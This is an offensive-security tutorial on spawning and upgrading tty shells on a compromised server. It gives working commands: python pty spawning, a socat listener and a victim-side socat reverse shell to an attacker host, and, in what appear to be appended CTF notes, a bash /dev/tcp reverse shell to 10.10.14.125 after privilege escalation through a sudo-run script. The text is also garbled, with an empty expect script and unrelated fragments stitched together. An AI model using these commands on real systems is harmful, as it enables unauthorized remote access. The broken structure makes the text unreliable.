Spawning a tty shell
This method is the most popular method spawning a tty shell. This requires the target server to have python (or python3) installed. Keep in mind to spawn
python -c "import pty;pty.spawn('/bin/bash')"
Not all server have
expectinstalled by default, however if you're lucky enough, you can use this command to spawn a tty shell.
$ expect -v
expect version 5.45.4
$ cat > /tmp/shell.sh <<EOF
$ chmod u+x /tmp/shell.sh
Socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY's over TCP connections.
Again, not every server has
socatinstalled (not installed by default). You could try to compile the binary itself or download a socat static binary.
Anyway in this example, we are going to use socat to spawn another reverse shell with tty support. If you looking for bind shell instead, see in this post.
On the attacker machine, set up socat listener: replace 4444 with your listning port.
socat -,raw,echo=0 tcp-listen:4444
On the victim machine, connect back the attacker machine and spawn a shell. Replace
<host>with attacker IP and
<port>with attacker listing port.
$ socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:<host>:<port>
To check if the shell is a tty shell, simply enter
ttycommand like below.
Once you manage to upgrade to tty shell, you still have a limited shell (not fully interactive). You won't be able to use tab-completion and arrow keys. This is really frustrating and it can be more risky if an execution gets stuck, you can't use
ctrl+zwithout killing your session. Follow my next tutorial here on how you can upgrade the shell to fully interactive shell.
bash -i works but tab autocomplete is not working:
ctr + z to back ground it.
running the sudo -l got me to the personal zip folder.
Unzip it by typing "unzip personal.zip"
went to the directory and check the monitor.sh
stty raw -echo
Maybe if we replace it with a different bash script, we can get a reverse shell?
bash -i >& /dev/tcp/10.10.14.125/4545 0>&1 $